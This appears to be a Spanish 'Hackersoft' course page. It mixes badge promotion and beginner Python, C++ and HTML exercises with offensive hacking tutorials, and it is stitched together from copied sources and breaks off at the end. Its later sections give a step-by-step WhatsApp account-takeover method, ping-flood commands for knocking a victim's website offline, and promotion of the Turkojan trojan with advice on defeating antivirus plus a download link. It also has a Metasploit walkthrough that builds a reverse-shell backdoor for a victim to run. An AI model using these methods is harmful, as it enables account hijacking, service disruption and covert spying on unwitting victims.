INICIAMOS

evento del 18,19,20,21 y 22 - 7ta entrega Hackersoft


Te animamos a que te inscribas y ser uno de los mejores  miembros en HACKERSOFT, tienes muchas posibilidades de obtener un BOTON DE DISTINCION, demostrar a tu familia, amigos, compañeros, novia - novio, que perteneces a la nueva sociedad tecnológica HACKERSOFT. Con tu afiliación podemos brindarte mejores servicios y capacitación, te invitamos a que nos apoyes afiliándote como miembro.

NOTA: Cada botón distintivo está registrado Copyright, demás cada persona que se afilie cada botón o distintivo tendrá un código de barra único, la copia o preventa de estos distintivos de pie, para demanda derecho de autor. Este evento HACKERSOFT, es algo legítimo, único, como tal merece respeto las actividades, distinciones que otorgamos a nuestros afiliados, por el respeto de cada persona en aprender e incentivarlos.

 


enero 21-22

contenido tema principal de la 7ta entrega hackersoft


¿Qué métodos usan los hackers para entrar en otro ordenador?


Como saber la IP de otra persona Sin programas 2015


Controlar remotamente otro PC sin ningún programa


Cómo hackear una cuenta de WhatsApp solo con un truco. Y como protegerte

 

 


Más de una vez a cualquiera se le ocurrió la posibilidad de revisar en el celular de otro las diferentes conversaciones de WhatsApp.

Hoy te traemos un importante fallo de seguridad de WhatsApp, entre tantos otros bugs y vulnerabilidades. Un método que permite robar cuentas de WhatsApp.

Con un simple procedimiento, desde el dispositivo móvil de uno se puede registrar el número de otro usuario para acceder así a sus diálogos. Hay una manera rápida y sencilla de acceder al WhatsApp de otra persona para leer sus conversaciones, por lo que si no quieres que te pase a ti debes leer esto.

Esto no es necesariamente un hack sino un exploit del servicio de activación de WhatsApp que permite registrar el número de otra persona en tu teléfono para acceder a sus conversaciones.

Algunos lo encontrarán útil, a otros les parecerá una tontería, lo cierto es que esta información que encontramos en TheHackerNews nos parece importante compartirla para que no pierdas de vista tu cel.

Requisitos:
- Tener acceso al celular en cuestión (al menos por cinco minutos)
- Contar con un segundo móvil con WhatsApp recién instalado y sin activar
- Que el primer teléfono, del que se quiere conseguir el material, tenga activo el respaldo de chats en WhatsApp
- Conocer el número de cel de la víctima (Obviamente)

Procedimiento:

Con el segundo celular abre WhatsApp y avanza a la pantalla de registro. Cuando te pida el número a registrar introduces el del móvil a revisar. Como parte del proceso de verificación de identidad se envía un SMS al teléfono de la víctima con el código de activación.


Al tener acceso al cel podrás consultarlo de inmediato, siempre y cuando tenga activas las notificaciones en la pantalla de bloqueo (puede que la persona tenga clave para desbloquearlo). El SMS de WhatsApp es tan corto que puede visualizarse sin problemas.

En caso de que no tenga las notificaciones activas o que el celular esté bloqueado y no conozcas la clave, pasados 5 minutos sin introducir el código, WhatsApp permite la opción de llamar para decirlo por móvil; tendrás que esperar para recibir la llamada con el código (PIN se les dice en algunos casos). La gracia de la llamada es que puede recibirse aún si el teléfono está bloqueado.


Una vez se tenga el código de verificación de WhatsApp se ha completado el robo. La cuenta pasa a ser tuya y pueden pasar días hasta que el propietario original la recupere.

Con el PIN haces la activación de WhatsApp en tu cel. Si el otro dispositivo tiene activo el respaldo de mensajes (se activa de modo manual en la configuración de chat y permite seleccionar respaldos diarios, semanales o mensuales), podrás descargarlo en tu celular, y es así como tienes acceso a los registros de chat de la víctima. Si esto no está activo entonces el hack solo sirve para mandar mensajes utilizando su cuenta.

El problema para la otra persona no es solo que accedan a sus conversaciones, sino que tendrá que esperar 25 minutos para poder reactivar WhatsApp en su móvil, lo cual es tiempo suficiente para que hagas de las tuyas. Así que te recomendamos no prestarle tu aparato a cualquiera.

Cómo evitar el robo de tu cuenta de WhatsApp

Si recibes un SMS extraño de WhatsApp (o una llamada) con un PIN de verificación, sospecha que alguien puede estar intentando robarte la cuenta y toma medidas de protección.

Piensa si estás dispuesto a perder parte de la funcionalidad del sistema operativo y el asistente personal por reconocimiento de voz desactivando ciertas notificaciones que se pueden conseguir en pantalla bloqueada y que permitirían robar tu cuenta de WhatsApp si pierdes el teléfono.


Cómo recuperar tu cuenta de WhatsApp si te la han secuestrado

Si llegas tarde y ya te han robado la cuenta no te desesperes. Aún puedes recuperarla.

Lo primero es intentar abrir sesión en tu cel solicitando e introduciendo un nuevo código de activación en tu celular.

Si el "hacker" es especialmente perverso, puede pedir numerosas veces el PIN de verificación tras robar tu cuenta. Por seguridad WhatsApp va alargando los tiempos entre esos intentos y ya no sean 25 minutos, lo cual puede conducir a que te pases horas o incluso días sin poder hacer un nuevo login en tu móvil.

Si la cosa se alarga en exceso contacta con WhatsApp y cuéntales tu situación para que puedas recuperar el acceso a tu cuenta.

Una vez recuperes el control de la cuenta toma las medidas preventivas que detallamos arriba.

Hay que dejar claro que secuestrar las cuentas de WhatsApp de terceros es delito y que el único propósito de este artículo es divulgar una vulnerabilidad para proteger a los usuarios y para que WhatsApp y las operadoras le pongan solución lo antes posible, añadiendo procesos de verificación de identidad más seguros (por ejemplo con verificación en dos pasos, o a través de un mail de confianza), así evitando que puedas ser "hackeado" de un modo tan lamentablemente sencillo.



enero 20

octavo botòn distintivos - lenguaje programacion phyton

actividades phyton

Curso Completo:
Programacion Python 1 : Descargando e instalando
Programacion Python 2 : Interprete,operaciones PARTE 1
Programacion Python 2 : Interprete,operaciones PARTE 2
Programacion Python 3 : Return vs Print y Ciclo definido for
Programacion Python 4: Utilizar Editor e importar al interprete
Programacion Python 5: Ejercicio Raices de un Polinomio
Programacion Python 6: Continuacion del Ejercicio Funcion main()
Programacion Python 7: Comparaciones y operadores logicos
Programacion Python 8 : ciclo indefinido (while)
Programacion Python 9 : Cadenas de Caracteres
Programacion Python 10 : Tuplas
Programacion Python 11 : Listas
Programacion Python 12 : Ejercicios Listas y Tuplas
Programacion Python 13 : Mas sobre Listas y cadenas
Programacion Python 14 : Diccionarios
Programacion Python 15 : Diccionarios Continuacion
Programacion Python 16 : Primer Juego
Programacion Python 17a: Adelanto Segundo Juego (mas complejo)
Programacion Python 17b: Segundo Juego (mas complejo)
Programacion Python 18 : Segundo Juego (parte 2)

.py to .exe

Programacion Python 19 : Manejo de Archivos
Programacion Python 20 : Manejo de Archivos 2 (escribir)
Programacion Python 21 : Archivos CSV
Programacion Python 22 : Ejemplo de Archivos
Programacion Python 23 : Ejemplo de Archivos (segunda parte)
Programacion Python 24 : Objetos
Programacion Python 25 : Primer Objeto (punto)
Programacion Python 26: Segundo Objeto (auto)
Programacion Python 27 Objetos : metodos especiales
Programacion Python 28 Objetos : metodo de comparacion
Programacion Python 29 : Herencia
Programacion Python 30 : Ejemplo Herencia 1
Programacion Python 31 : Ejemplo Herencia 2
Programacion Python 32a : Adelanto Juego Objetos
Programacion Python 32b : Juego Objetos Parte1 (Clase Jugador y AI)
Programacion Python 33: Juego Objetos Parte 2 (Clase Bola de F y Golpe)
Programacion Python 34 : Juego Objetos Parte 3 (Clase Golpiar)
Programacion Python 35 : Juego Objetos Parte 4 (asignacion de stats random)
Programacion Python 36 : Juego Objetos Parte 5 (metodo eleccion)
Programacion Python 37 : Juego Objetos Parte 6 (motor Básico)
Programacion Python 38 : Juego Objetos Parte 7 (emprolijando el motor)
Programacion Python 39 : Juego Parte 8 (Modificaciones para 2 jugadores)
Programacion Python 40: Pilas y Colas (concepto)
Programacion Python 41 : Implementacion Pilas

 


Enero 19

septimo botòn distintivos - lenguaje programaciòn.


actividad I

LENGUAJE DE PROGRAMACIÒN -ANDROID

1. Descargar Eclipse, netbeans, visual studio, edito c+

2. Instalarlos deben tener conocimientos bàsicos de programaciòn

3. Realizar los siguientes Ejercicios que cargare en el siguiente archivo.

 

Descarga
EJERCICIOS ECLIPSE NETBEANS ANDROID.pdf
Documento Adobe Acrobat 672.0 KB

ACTIVIDAD ii

LENGUAJE DE PROGRAMACION NETBEANS

1. Desarrollar un pantallazo de una veterinaria con frame en netbean

2. Desarrollar un pantallazo de un cajero automàtico

3. Desarrollar un pantallazo de un centro de comidas.

4. Deben haber descargado Netbeans

actividad iii

LENGUAJE PROGRAMACION C++

1. Crear registro de notas de alumnos del Colegio Mixto, para la cantidad de 4000 estudiantes Secundaria

2. Datos a capturar: tarjeta identidad, nombres, apellidos, grado, materia, notas 1, notas 2, nota 3, definitiva, nombre del director de grupo.

3. Crear el contador Alfanumerico, digitas dos letras, cada letra convertirla en numero binario.


NOTA: DEBEN REALIZAR LOS EJERCICIOS Y ASI APRENDER A MANEJAR LOS LENGUAJES DE PROGRAMACIÒN.


SEGUNDO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL II


ACTIVIDADES

VAMOS A MANEJAR UN POCO DE HTML

Para realizar esta actividad debes tener conciencia que ir poco a poco ir apendiendo

 

ACTIVIDAD 1: Entra al navegador entra a la pagina google, escribe html, cuando te aparezca los link de busquedad, busca tres pautas: CONCEPTO, COMANDOS, ESTRUCTURA

 

ACTIVIDAD 2: Desarrolla el siguiente ejemplo:

Características de los campos del formulario:
Campo Nombre de la caja de texto Tamaño
Nombre nombre 12
Primer Apellido apell1 (por defecto)
Segundo Apellido apell2 (por defecto)
Domicilio domicilio 18
Código Postal CP 5
Teléfono tel 9
e-mail mail 25

 

ACTIVIDAD 3: Donde vamos a desarrollar o escribir el HTML, debes descargar el siguiente programa:

Amaya - editor HTML

 

Amaya es una herramienta combinada del W3C compuesta por un navegador web y una herramienta de autor. Cualquier página web que se abra puede ser editada inmediatamente. Se pueden ver y generar páginas HTML y XHTML con hojas de estilo CSS, expresiones MathML y dibujos SVG. Una gran característica consiste en que puede ver los enlaces que se crean con el editor.

Visualiza imágenes, como las que tienen formato PNG y un subconjunto del formato de Gráficos Vectoriales Escalables (SVG), como figuras básicas, texto, imágenes y foreignObject (el último es útil para incluir fragmentos HTML o expresiones MathML en los dibujos). Los gráficos están escritos en XML y pueden ser mezclados libremente con HTML y MathML.

Es software libre, disponible para sistemas tipo Unix, Linux, Mac OS X, Windows y otras plataformas. La última versión liberada es la 11, que fue lanzada el 16 de diciembre de 2008. Esta versión soporta HTML 4.01, XHTML 1.0, XHTML Basic, XHTML 1.1, HTTP 1.1, MathML 2.0, muchas características CSS 2, e incluye soporte para gráficos SVG (transformación, transparencia y animación SMIL), además se puede, no sólo visualizar sino además editar, de manera parcial, documentos XML. Se puede decir que es una aplicación <<internacionalizada>>.

Descarga
Practicas html.pdf
Documento Adobe Acrobat 983.6 KB

De este documento PDf, van a selecionar 5 ejercicios, con el programa Amaya Editor HTML, realizar las actividades, y enviarlas al correo: eventohackersoft@gmail.com


TERCER BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL III

ACTIVIDADES

QUE TANTO SABEN DE LOS NAVEGADORES, CUAL ES EL MAS CONFIABLE

ACTIVIDAD 1: Cuantos navegadores conocer, y en cual confias mas.

 

ACTIVIDAD 2: Instala Chrome - Motzilla, luego de instalarlos prueba cual se comporta mejor.

 

ACTIVIDAD 3: Actualiza los plugin, que es plugin, en google en la zona de busquedad coloca plugin, tendras un concepto mas amplia.

 

ACTIVIDAD 4: Por que cree es tu que se congelan los navegadores, falta de memoria RAM, espacio de Memoria.

 


CUARTO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL IV

ACTIVIDADES

QUE TANTO CONFIAS DE TUS ANTIVIRUS Y ANTIMALWARE

ACTIVIDAD 1: Identifica que tan eficiente es tu antivirus, malware, cada cuanto lo actualizas

 

ACTIVIDAD 2: Como sabes que tu antivirus es efectivo, contra virus, malware, troyanos, spam

 

ACTIVIDAD 3: Cuantos antivirus debes tener instalado en tus dispositivos.


QUINTO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL V

ACTIVIDADES

CUAL DISPOSITIVOS MANEJAS MAS TIEMPO: PC - PORTATIL - SMART PHONE - TABLET

ACTIVIDAD 1: Como los identificas a cada uno de ellos.

 

ACTIVIDAD 2: Que sistema operativo tiene cada uno, como has aprendido de cada uno de ellos, que tiempo le has dedicado.

 

ACTIVIDAD 3: Como te has sentido al manejar del PC AL PORTATIL, DEL PORTATIL AL SMART PHONE, del SMART PHONE a la TABLET.

 

ACTIVIDAD 4: Que capacidad tiene cada uno de ellos, que guardas en cada uno, estan seguro tus datos

 

ACTIVIDAD 5: Que tipo de conexion empleas para internet : A. WIFI . B. PLAN DE DATOS  C. WIFI PIRATA.


SEXTO BOTON DISTINTIVOS - MIEMBRO APRENDIZ HACKERSOFT NIVEL VI

ACTIVIDADES - 19 ENERO DEL 2016 - CONTENIDO PRINCIPAL DEL EVENTO

Todo lo que debes saber sobre un DDoS

 

Un jodido DDos (que viene de Distributed Denial of Service) es un ataque (que se puede realizar de diversas formas) a un sistema de computadoras que causa que un servicio o recurso sea inaccesible a los usuarios legítimos (por ejemplo, y en nuestro caso, una página web). Normalmente provoca la pérdida de la conectividad de la red por el consumo del ancho de banda de la red de la víctima o sobrecarga de los recursos del sistema de la víctima (incluso aunque tengas un VPS, por ejemplo).

 

Después de este copypaste de Wikipedia, hablemos claro. En estos artículos vamos a hablar de las diversas formas que hay de atacar mediante DDoS, y qué software o medios se emplean. Normalmente la idea básica en nuestra temática la podemos resumir en esto.

 

Víctima tiene página web -> Bastardo quiere tumbarla -> Bastardo usa un ataque DDoS lo suficientemente potente para que el hosting de la víctima colapse -> Los usuarios que quieren entrar a la web de la víctima se encuentran con que está caída mientras dura el ataque -> Bastardo tiene orgasmos de placer

 

Como veis un ataque DDoS es una faquinshit. Se pueden citar cientos de formas de atacar una web, sin embargo en la actualidad destacan por su relevancia programas como LOIC (que os pasaré y enseñaré a usar), usados por los “Anonymous” para joder al FBI, etc. Como hoy no quiero asustaros con mucha información, vamos a empezar por la base de la pizza… lo más básico en cuánto a ataques DDos. Se llama el “Ping de la Muerte” y aunque en la actualidad su funcionalidad no es de gran valor, nos sirve para entender mejor la historia de los ataques DDoS y cómo funcionan.

 

 

 

Ataque DDoS en CMD – Ping de la Muerte

 

Este tipo de ataques se realizaron mucho hace más de 15 años, e hicieron mucho daño en el creciente ambiente cibernético de la época. El sistema consistía en mandar numerosos paquetes ICMP grandes (mayores a 65.535 bytes) con el fin de colapsar el sistema atacado. Todo ello se realizaba a través de pings deformados con tamaños mucho mayores a los comunes 64 bytes. Hoy en día realizar dichos ataques DDoS mediante pings es muy sencillo, sin embargo todas las redes actuales están protegidas ante dichos ataques tan anticuados, por lo que hace falta mandarlos desde varios ordenadores para que puedan funcionar. Si bien los pings deben tener un peso de más de 65.535 bytes, yo no he conseguido mandarlos con más de 15.000 bytes, por lo que necesitaría otros usuarios mandando el mismo ataque DDoS a la misma web para tener la posibilidad de tumbar una página web con un hosting normalillo 

 

Ahora explicaré cómo se realiza el ataque. Entramos a nuestro menú de Windows y ejecutamos CMD. Se nos abrirá la típica pantalla de MSDOS en la que, si ponemos ping, veremos las opciones de la función que empleamos.

 

 

 

Sobra decir que las opciones que emplearemos para nuestro ping son “-t” y “-l”. Con la “-t” mandamos el ping de forma repetida y continuada, y con la “-l” elegimos el peso de cada ping, en este caso búfer. Ahora debemos conocer la IP de la web a la que queremos atacar. Para ello tecleamos un nuevo y simple comando: “ping www.webqueatacare.com” y damos a “Intro”. En pocos segundos nos dará una IP como veis a continuación:

 

 

 

Ahora, con la IP de nuestra víctima, debemos teclear el nuevo comando que hará temblar la página. Os recomiendo escribirlo en un bloc de notas y luego pegarlo en el CMD para que podáis modificarlo rápidamente. El formato debe ser así: “ping 123.111.23.453 -t -l 15000”. Lógicamente debéis cambiar la IP por la de vuestra víctima, y la cifra final es la cantidad de bytes que estáis enviando. La “-t” y “-l” son los comandos de ping que empleamos. En la siguiente pantalla podéis ver un ataque de pings exitosos.

 

 

Si los pings no dan respuestas y da un mensaje del tipo “Tiempo de espera agotado para esta solicitud”, significa que la cantidad de bytes que hemos puesto es muy alta. Debemos ir regulando la cantidad para saber cuantos bytes soporta por ping. Una vez sepamos la cifra máxima soportada, es cuanto entra en juego el trabajo en equipo. Busca amigos, foreros, webmasters y/u otro tipo de gente que esté dispuesta a ayudarte y facilítales la información, cantidad de bytes y método y poneros a funcionar todos a la vez en la misma web. En función del tipo de hosting que tenga la víctima y la calidad del mismo es posible que podáis tumbar una web con esta técnica tan simple y antigua


hacer un ataque de denegacion de servicio (DDoS) sin que se nos queme el router y nos deje sin conexion.

Como  como saturar una red (modem) con el antiguo "ping de la muerte" que ya está prácticamente parchado en todos los computadores de mundo. El punto es que el resultado del "ping de la muerte" ya no es efectivo porque las redes pueden soportar ese tamaño de paquete, entonces... Qué sucedería si muchos computadores unidos hacen el ping de la muerte contra una sola red ???... En teoría debería caer, ya que cualquier exceso en una red generaría un D.o.S, incluso si muchas personas (sin ningún código mágico) se conectase a una red, ésta se cae...

 

De esté modo se entra a explicar lo que hace el famoso ping de la muerte y como crear un batch que genere un loop infinito para gastarle a la red un pedazo de conexión extra permanentemente. Y si se une muchos "amigos" con este Batch quizas botar la web por  D.o.S.

 

Por último, vale mensionar que hay metodos D.o.S mucho más efectivos que este, pero es interesante este método y sirve para explicarse un poco mejor que es un  D.o.S.

 

Bien, hoy vamos a aprender, a como saturar un modem, a base de pings.

 

Una aclaración antes de todo, esto ya NO funciona en el 90% de los casos, pero he pensado que por saber mas o menos como se realiza un ataque D.o.S, que no falte jeje.

 

 Un ping es un tipo de mensaje ICMP, que se usa para ver si una máquina se encuentra operativa y accesible.

 

El procedimiento es enviarle un ping a la máquina; ésta lo recibe y contesta. Al recibir la contestación ya sabemos que la máquina vive. Si no se recibe en un plazo dado se considera como no accesible (la máquina podría estar apagada, o todos los "caminos" en la red hacia ella cortados).

 

La manera de usar esto de forma ofensiva consiste en mandar más pings a un usuario de los que su máquina pueda contestar, saturándole su conexión a Internet.

 

Un ping de la muerte es un tipo de ataque enviado a una computadora que consiste en mandar numerosos paquetes ICMP muy pesados (mayores a 65.535 bytes) con el fin de colapsar el sistema atacado.

Los atacantes comenzaron a aprovecharse de esta vulnerabilidad en los sistemas operativos en 1996, vulnerabilidad que en 1997 sería corregida.

Este tipo de ataque no tiene efecto sobre los sistemas operativos actuales.

Es un tipo de ataque a computadoras que implica enviar un ping deformado a una computadora. Un ping normalmente tiene un tamaño de 64 bytes; algunas computadoras no pueden manejar pings mayores al máximo de un paquete IP común, que es de 65.535 bytes. Enviando pings de este tamaño puede hacer que los servidores se caigan. Este fallo fue fácil de usar, generalmente, enviar un paquete de "Ping de la Muerte" de un tamaño de 65.536 bytes es ilegal según los protocolos de establecimiento de una red, pero se puede enviar un paquete de tal tamaño si se hacen fragmentos del mismo; cuando la computadora que es el blanco de ataque vuelve a montar el paquete, puede ocurrir una saturación del buffer, que causa a menudo un fallo del sistema. Este exploit ha afectado a la mayoría de Sistemas Operativos, como Unix, Linux, Mac, Windows, impresoras, y los routers. No obstante la mayoría de los sistemas operativos desde 1997-1998 han arreglado este problema, por lo que el fallo está solucionado.

Como hacerlo¿?¿

el ping de la muerte es muy facil de hacer
desde el simbolo de sistema se tira un ping extendido de mas de 65.535 byte.
el comando seria este:
EJ:
ping -t 192.168.1.1 -l 65.596

-t: ping al host especificado hasta que se pare.
-l: es la longitud del ping (cantidad de bytes).
comprobado que funciona:
si funciona eso no lo se, por que no me anime a probarlo. La mayoria dice que no. Supongo que debe ser verdad que no funciona por que es muy viejo.
Pero si se animan comprueben si funciona.

Si quieren ver una imagen de como hacerlo veanla aqui:
http://www.imaxenes.com/imagen/ping_de_la_muerte21wn581m.jpg.html

algo mas reciente:
Un ping flood, consiste en saturar una línea lenta con un número de paquetes ICMP suficientemente grande. Esta saturación causará una degradación del servicio importante. El ataque en cuestión utiliza las definiciones de la longitud máxima de protocolos así como la capacidad de fragmentación de los datagramas IP.

La longitud máxima de un datagrama IP es de 64K (65535 Bytes) incluyendo la cabecera del paquete (20 Bytes).

El protocolo ICMP es el que se utiliza para la comunicación de mensajes de control de flujo en las comunicaciones.

Luego para enviar un mensaje ICMP tenemos disponibles 65535(datos) 20 (cabecera IP) 8 (cabecera ICMP) = 65507 Bytes.

En el caso de enviar órdenes al sistema operativo para que envie un datagrama de longitud de 65510 bytes (inferior a los 65535) con lo que los datos a enviar cogen un único paquete IP (fragmentado en N trozos, pero pertenecientes al mismo datagrama IP).

Si sumamos:

65510 + 20 + 8 =65538

Debido a que el espacio disponible tan sólo es de 65535 bytes al reensamblar el paquete en el destino se suelen producir errores de overflow/coredump que causan la parada del servicio o del sistema atacado.

 



Como espiar a tu victima - HACKEAR Y ESPIAR PC SIN MANDAR NADA

Turkojan 4

 

 

Ayer salio la version 4 del troyano turco, troyano que se caracteriza por su gran cantidad de herramientas y sus funciones FUN.
Por ahora es indetectable y tiene la opcion de cambiarle el lenguaje a español y a otros idiomas mas.

Lo nuevo:

 

  • Remote Desktop feature added.You can view remote screen and control it via your keyboard and mouse.
  • Now you can record video from remote webcam.
  • Audio streaming feature added.
  • Now you don't need to download images from remote computer,you can view them with thumbnail manager.
  • You can get MSN logs with MSN Sniffer.
  • You can block harmful web-pages on remote computer.
  • You can manage remote computer with ms-dos commands.(Remote Shell)
  • New functions added for server secrecy
  • -Now it is harder to delete server
  • -Server can't be show in registry,searching files,msconfig,etc.
  • -Server can't be shown in ctrl+alt+del menu[Vista/Xp/95/98/ME].
  • -Server prevents system restoring.It deletes all system restore points.
  • Server size is %60 smaller now.
  • Connection bug fixed
  • Now server can't be dedectd by any anti-virus software,
  • but i think it will be dedected soon.
  • Some changes were made in Client appearance
  • Now advanced keylogger can capture clipboard changements.
  • You can install any file to remote computer from internet via Remote Downloader.
  • Now you can get more information about remote computer.
  • You can learn installed softwares on remote computer.
  • Help mode added.So you can create visible servers.



Imagenes:







En español:

Editado:
Cuando lo ejecutan al cliente modifica su pagina de inicio por la pagina principal del troyano del Internet Explorer 6.
Si nesecitan saber como sacarla dejen un comentario asi les respondo.

Turkojan Help

Q: What is Turkojan?
A. Turkojan is a remote administration and spying tool for Microsoft Windows operating systems.

You can use Turkojan for manage computers,employee monitoring and child monitoring...

Q: How can I download Turkojan?
A. You can download Turkojan from here .

Q: What operating systems are supported?
A. Windows 95/95B
Windows 98/98SE
Windows ME
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista.

Q: When I try to download Turkojan a problem occurs,what can i do?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So your antivirus software could prevent downloading it.Close your antivirus software and try again..

Q: I have downloaded Turkojan,what should i do now?
A. You need to do some configrations to use Turkojan :

- Firstly, you need to forward port 15963(TCP) on your router.

- If you don't have static ip address,your IP address will change every time you connect to the internet.So your server won't be able to reach you.
To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.

Q: My antivirus software says that Turkojan includes a virus,is it true?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So your antivirus software can be the problem that prevents installing and downloading Turkojan,you can close your antivirus software and try to install Turkojan again.We suggest you to buy Turkojan Private Edition.

Q: How can I forward port 15963?
A. You can get detailed information about forwarding ports from here .

Q: Will Turkojan slow down my computer?
Y. No. Turkojan is a really small and efficient application. It works quietly in the background and has been optimized to minimize resource use. You will not notice any decrease of performance of your computer..

Q: I have forgetten the password of my router,what should I do?
A. You can reset your router and load default settings.

Q: How can I understand that my ports are successfully forwarded?
A. You can use Port Tester in Turkojan Client.Check local tools in left menu..

Q: Why should I register a No-Ip veya DynDNS account?
A. If you don't have static ip address,your ip address will change every time you connect to the internet.So your server won't be able to reach you.

To prevent loosing servers because of Dynamic IP Address System,you need to create an account from No-ip or DynDNS services.

You can check videos, showing how to create accounts from these services..

Q: I have forwarded tcp port 15963 and create an account from No-Ip or DynDNS service,what should I do now ?
A. Now you need to create a server and send it to the computer that you want to connect.You can learn creating server from here.

Q: I have created a server from Server Editor,but I can't see any server in directory where I save. Why ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.

Your antivirus software can label Turkojan Public Edition as unwanted application,so we suggest you to uninstall your antivirus software.

Q: I have created server,but I can't send it via MSN or mail, what should i do ?
A. Server file is an application so you can't send this type files via MSN and mail.So you need to add these files into archieve.We suggest you to use Winrar or Winzip..

Q: I did everything but when I send a server to my friend , I can't connect him/her.Why ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs. So antivirus software which is installed on remote computer can cause this,we suggest you to buy Turkojan Private Edition.

Q: My and my friend's antivirus softwares are closed,but I still can't connect,what should I do ? ?
A. Your friend should uninstall antivirus software completely.

Q: I can see remote computer on Turkojan,but I can't manage this computer.What should I do?
A. Congratulations.. To manage or start monitoring remote computer,you need to select it from the list and double click on it...

Q: I want to order Turkojan Private Edition.How much should I pay and how can I pay ?
A. You can contact us via e-mail,we will reply it as soon as possible..

Q: What are the differences between Turkojan Public Edition and Turkojan Private Edition ?
A. Turkojan Private Edition can't be labelled as unwanted program by antivirus softwares.That means Turkojan will work without any problems with Antivirus softwares.

Q: After I purchase Turkojan Private Edition,if I have any problems,what can I do ? ?
A. If you have any problems you can contact us 7/24 via MSN and mail. Also you will be able to login private zone,so you can get help from other customers that bought Turkojan...

Q: How can I login private zone ?
A. We will send you a username and password after you purchase Turkojan Private Edition,so you will be able to login with these information..

Q: Is Turkojan illegal ?
A. No, there is nothing illegal about Turkojan itself. The vast majority of its developer is law-abiding person who create his programs exclusively for legitimate purposes.
There are many situations when monitoring the computer activity is perfectly legal: the parents can use key loggers to protect their children from online abuse,the companies may use Internet monitoring software to ensure that their employees don't misuse corporate Internet connection and so on. Of course some people can
use the very same software for stealing passwords, credit card numbers or corporate secrets. However, even in this situation it's not the software that breaks the law, but the person using it. There are also uses that are not strictly illegal, but have some moral ambiguity to them (for example, a computer activity monitor may be used to catch in the act a cheating spouse). When Turkojan is purchased the purchaser agrees that the computer it will be installed on is his or her own computer..

Q: Do I break any law by using Turkojan ?
A. It depends on the way you use them. In most cases you have the right to install any programs on the computer that belongs to you. You also have the right to install programs on other peoples' computers if you have their permission. Installing a monitoring program on another person's computer without his/her permission may be illegal. We will not try to give you any advice on the legal side of computer activity monitoring because everything depends on your particular situation. If you are in doubt, consult your lawyer..

Q: Can Turkojan be used for any legitimate purposes ?
A. Yes, sure. Here are just a few examples of perfectly legal uses of computer activity monitoring tools. You can:

- Monitor your children's online activity to make sure they don't visit pornographic Web sites or don't make any dubious acquaintances.

- Ensure no one is accessing your personal files while you are away from the computer.

- Keep track of the inexperienced users' activity to quickly locate the problem if they damage any system files.

- Monitor your employees' computer activity to make sure they are really working and don't do anything that may be a source of legal problems for you.

- Find out if someone uses your computer while you are away. . .

Q: Why should I buy Turkojan Private Edition ?
A. Due to the increased demand for remote spying products, anti-virus and anti-spyware software label some of them as potentially unwanted programs.So Turkojan Private Edition is special for you and can't be labeled as unwanted program. During support period if our software is known to be detected we will work to ensure an update is released that will eliminate the problem..


aca les dejo este video y todo lo necesario par poder controlar una pc con turkojan v4 por sierto les dejare el link del turkojan v goold con todo lo que necesitan suscribansen y comenten cualquier duda ya saven solo comenten saludos :D http://www.mediafire.com/?81d6574804k1fov

 

 

 

Turkojan es un troyano de conexión inversa. Con este troyano tenemos acceso 100% al PC , podemos conseguir contraseñas , editar registro de Windows , bajar archivos , subir archivos etc. El servidor del troyano tiene un 65% de indetabilidad.

 

Este programita es parecido al BIFROST pero con un manejo TOTALMENTE EN ESPAÑOL y MUCHO MAS SENCILLO.
Bueno con este programa podemos ACCEDER A TODOS LOS RINCONES DEL PC DE NUESTA VITCTIMA , MANEJAR SU RATON,  VER SUR FOTOS, BORRARLE ARCHIVOS , DESINSTALARLE PROGRAMAS,  ENFIN DE TODO LO QUE OS PODAIS IMAGINAR ES COMO SI EL PC LO TUVIESEIS DELANTE VUESTA…si pero seguro que lo detecta su antivirus… en verdad debería pero he metido en el pack el THEMIDA que hace INDETECTABLE nuestro TROYAN

 


Trojan Shells "Creating a backdoor & Hacking the webcam or desktop of Windows 8 using Metasploit"como hackearpc tan solo sabiendo la ip


HACK ANY WINDOWS 7 WITH METASPLOIT

In this tutorial i will exploit a Windows 7 Sp1 OS using Metasploit. i will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched  outside of the framework“
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:

msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe

I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.

After that, you should be able to see a file named as backdoor.exe in /root. Send the file to the victim by using your Social Engineering skills and let him click the file. You can change the name of the file so that it is not that obvious.

Launch Metasploit and set the exploit by typing these commands in your msfconsole:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.5
set lport 4444
exploit

If all goes well, you should be able to establish a meterpreter session. Typesysinfo to gather some info on the machine. To know other commands for the meterpreter type help. There are also other meterpreter commands like capturing the screenshot of the PC, record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.
it,s cool to take a screenshot with meterpreter command screenshot.
Regards.

 

 

 

Create Simple Exploit Using Metasploit to Hack Windows 7 - See more at: http://www.hacking-tutorial.com/hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/#sthash.5aelhPhi.dpuf

 

As I have already wrote on my previous post about how to add a user with administrator rights (you can read the tips and trick here), today I will wrote a simple tutorial to create an exploit for Windows 7 and all Windows.

 

Everyone love and like the simple way isn’t it? that’s why in my previous tutorial and today tutorial I wrote everything about simple and easy to use

 

 

The tutorial today we will learn how to create a simple exploit (easy to create and easy to implement ) and how we connect to Windows 7 victim that already executed our simple exploit…simple isn’t it?

 

Okay let’s start the tutorial.

 

 

Requirements :

 

1. Metasploit Framework 2. Windows XP and earlier Windows version (I use Windows 7 SP1)

 

Step by Step :

 

